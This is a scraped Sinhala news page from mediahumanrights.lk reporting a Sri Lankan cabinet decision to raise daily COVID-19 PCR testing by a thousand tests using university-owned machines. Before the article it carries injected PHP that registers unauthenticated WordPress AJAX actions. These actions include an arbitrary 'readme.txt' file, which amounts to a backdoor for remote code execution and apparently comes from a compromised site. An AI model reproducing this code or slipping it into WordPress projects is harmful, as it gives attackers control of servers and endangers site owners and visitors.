if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දිනක පී.සී.ආර්. පරීක්ෂණ තවත් දහසකින් ඉහළට - mediahumanrights.lk
mediahumanrights.lk
Local News News

දිනක පී.සී.ආර්. පරීක්ෂණ තවත් දහසකින් ඉහළට

දැනට සෞඛ්‍ය අංශ මගින් දෛනිකව සිදුකරන කොවිඩ්-19 පරීක්ෂණ (පී.සී.ආර්.-PCR) සංඛ්‍යාව තවත් දහසකින් ඉහළ නැංවීමට කැබිනට් මණ්ඩලය අනුමැතිය ලබාදී ඇත. ඒ අනුව මෙරට විශ්වවිද්‍යාල සතුව ඇති සියලුම පී.සී.ආර්. යන්ත්‍ර භාවිත කරමින් මෙම පරීක්ෂණ ධාරිතාව ඉහළ නැංවීමට වහාම පියවර ගැනෙනු ඇත.

මේ වනවිට ශ්‍රී ජයවර්ධනපුර විශ්වවිද්‍යාලය සතුව පී.සී.ආර්. යන්ත්‍ර දෙකක්ද, කොළඹ විශ්වවිද්‍යාලය සතුව යන්ත්‍ර හතක්ද, පේරාදෙණිය විශ්වවිද්‍යාලය සතුව යන්ත්‍ර අටක්ද, සබරගමුව විශ්වවිද්‍යාලය සතුව යන්ත්‍ර දෙකක්ද, යාපනය විශ්වවිද්‍යාලය සතුව එක් යන්ත්‍රයක්ද, කැලණිය විශ්වවිද්‍යාලය සතුව එක් යන්ත්‍රයක්ද ඇති බව ඊයේ පැවති කැබිනට් තීරණ දැනුම්දීමේ මාධ්‍ය හමුවේදී ඇමැති බන්දුල ගුණවර්ධන අනාවරණය කළේය.මෙම පී.සී.ආර්. යන්ත්‍ර උපයෝගි කරගනිමින් දෛනික පරීක්ෂණ ධාරිතාව ඉහළ නැංවීමට කටයුතු කරන බවද ඇමැතිවරයා පැවසීය.

lanka lead news

Related posts

ජනාධිපති ගෝටාභයගෙන් අපට කිසිවක් ලැබෙන්නේ නෑ.. ඉන්දියාව මැදිහත් වී අපට ෆෙඩරල් ලබා දිය යුතුයි..

Shiran Viraj

පන්නන්න ගිය ලක්ෂ 89ක රන් භාණ්ඩ අත්අඩංගුවට

Shiran Viraj

Online පනතේ වගන්ති 57න් 31ක්ම ආණ්ඩුක්‍රම ව්‍යවස්ථාවට පටහැණියි…

Shiran Viraj